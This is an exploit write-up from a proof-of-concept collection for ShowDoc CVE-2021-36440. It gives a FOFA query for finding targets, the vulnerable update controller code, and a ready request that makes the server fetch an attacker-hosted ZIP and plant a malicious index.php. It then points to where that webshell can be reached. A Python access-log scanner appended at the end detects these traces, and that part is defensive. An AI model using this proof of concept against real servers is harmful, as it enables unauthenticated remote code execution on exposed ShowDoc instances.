Awesome-POC/Web应用漏洞/ShowDoc AdminUpdateController.class.php 任意文件上传漏洞 CVE-2021-36440.md
2022-12-05 11:09:28 +08:00


# ShowDoc AdminUpdateController.class.php Arbitrary File Upload Vulnerability CVE-2021-36440
## Vulnerability description
The update code in ShowDoc's AdminUpdateController.class.php performs no authentication and contains an arbitrary file upload vulnerability.
## Affected versions
```
ShowDoc < V2.9.5
```
## FOFA
```
app="ShowDoc"
```
## Reproduction
Login page
![image-20220524153008064](./images/202205241530123.png)
File path: `server/Application/Api/Controller/AdminUpdateController.class.php`
![](./images/202205241530546.png)
```php
public function download(){
    set_time_limit(1000);
    ini_set('memory_limit','500M');
    $new_version = I("new_version") ;
    $file_url = I("file_url") ;
    $version_num = str_replace("v","",$new_version) ;
    $showdoc_path = "../" ;
    // check that the installation files are readable and writable
    if(!$this->new_is_writeable($showdoc_path)
        || !$this->new_is_writeable($showdoc_path."Sqlite/" )
        || !$this->new_is_writeable($showdoc_path."web/" )
        || !$this->new_is_writeable($showdoc_path."web/index.php" )
        || !$this->new_is_writeable($showdoc_path."server/" )
        || !$this->new_is_writeable($showdoc_path."server/vendor/autoload.php" )
        || !$this->new_is_writeable($showdoc_path."server/Application/Api" )
    ){
        $this->sendError(10101,'请手动给showdoc安装目录下的所有文件可写权限否则程序无法覆盖旧文件');
        return ;
    }
    $temp_dir = sys_get_temp_dir()."/showdoc_update/";
    $zip_file = $temp_dir.'showdoc-'.$version_num.'.zip' ;
    mkdir($temp_dir) ;
    unlink($zip_file);
    $file = file_get_contents($file_url);
    file_put_contents($zip_file,$file);
    $zip = new \ZipArchive();
    $flag = $zip->open($zip_file);
    if($flag!==true){
        $this->sendError(10101,'下载更新压缩包失败');
        return ;
    }
    $zip->extractTo($temp_dir);
    $flag = $zip->close();
    $zip_file_subpath = $temp_dir.'showdoc-'.$version_num."/" ;
    if(file_exists($zip_file_subpath.'composer.json') && file_exists($zip_file_subpath.'web/index.php') && file_exists($zip_file_subpath.'server/vendor/autoload.php') ){
        //echo $zip_file_subpath.' exists';
        // move the directory to upload/update
        $this->copydir($zip_file_subpath ,$showdoc_path.'Public/Uploads/update/' );
        $this->deldir($temp_dir);
        $this->sendResult(array());
    }else{
        $this->sendError(10101,'下载更新压缩包后,解压的文件缺失');
        return ;
    }
}
```
Here the `$file_url` parameter is fully controllable, so the ZIP file can be downloaded from any URL. Looking further down, the only requirement on the ZIP is that a few specific files exist inside it:
```php
if(file_exists($zip_file_subpath.'composer.json') && file_exists($zip_file_subpath.'web/index.php') && file_exists($zip_file_subpath.'server/vendor/autoload.php') ){
```
Build a ZIP package in which index.php is the malicious file
![image-20220524153052669](./images/202205241530708.png)
Send the request
```
POST /server/index.php?s=/api/adminUpdate/download
file_url=http://xxx.xxx.xxx:8888/showdoc-2.zip&new_version=2
```
![](./images/202205241531609.png)
Visit the uploaded file at `Public/Uploads/update/web/index.php`
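As an added example, not part of this write-up or of the ShowDoc project, the following Python scanner reads constructed web-server access-log lines and flags the two artefacts this vulnerability leaves behind: calls to the unauthenticated `adminUpdate/download` route and execution of PHP files under `Public/Uploads/update/`. The log lines are constructed samples, and matching the PATH_INFO-style route (`/server/index.php/api/adminUpdate/download`) in addition to the `?s=` form is an assumption about ThinkPHP routing.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log (combined format); these are not real requests.
SAMPLE_LOG = """\
203.0.113.5 - - [24/May/2022:15:30:08 +0800] "POST /server/index.php?s=/api/adminUpdate/download HTTP/1.1" 200 37 "-" "curl/7.79.1"
198.51.100.7 - - [24/May/2022:15:30:12 +0800] "POST /server/index.php?s=%2Fapi%2FADMINUPDATE%2Fdownload HTTP/1.1" 200 37 "-" "python-requests/2.27"
198.51.100.7 - - [24/May/2022:15:30:20 +0800] "GET /Public/Uploads/update/web/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.9 - - [24/May/2022:15:31:00 +0800] "GET /server/index.php?s=/api/item/info HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.9 - - [24/May/2022:15:31:05 +0800] "GET /Public/Uploads/update/web/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

UPDATE_ROUTE = "/api/adminupdate/download"   # the unauthenticated ShowDoc update endpoint
UPLOAD_DIR = "/public/uploads/update/"        # where download() copies the extracted ZIP

def classify(target: str):
    """Return a finding label for one request target, or None if it looks benign."""
    parts = urlsplit(target)
    path = parts.path.lower()
    # ThinkPHP routes through ?s=/module/controller/action; parse_qs percent-decodes it,
    # so the URL-encoded and mixed-case variants are caught too.
    routes = [r.lower() for r in parse_qs(parts.query).get("s", [])]
    # Assumption: PATH_INFO routing (/server/index.php/api/...) is also accepted.
    if UPDATE_ROUTE in routes or UPDATE_ROUTE in path:
        return "adminUpdate/download called (unauthenticated update endpoint)"
    if path.startswith(UPLOAD_DIR) and path.endswith(".php"):
        return "PHP file executed from Public/Uploads/update/"
    return None

def scan_log(text: str):
    """Parse combined-format lines and return (ip, status, label, target) for every hit."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        label = classify(m["target"])
        if label:
            findings.append((m["ip"], int(m["status"]), label, m["target"]))
    return findings

if __name__ == "__main__":
    for ip, status, label, target in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {label}: {target}")
```

Because `file_url` travels in the POST body, the access log alone does not show where the ZIP was fetched from; the outbound request from the ShowDoc host to that URL is the matching signal on an egress proxy.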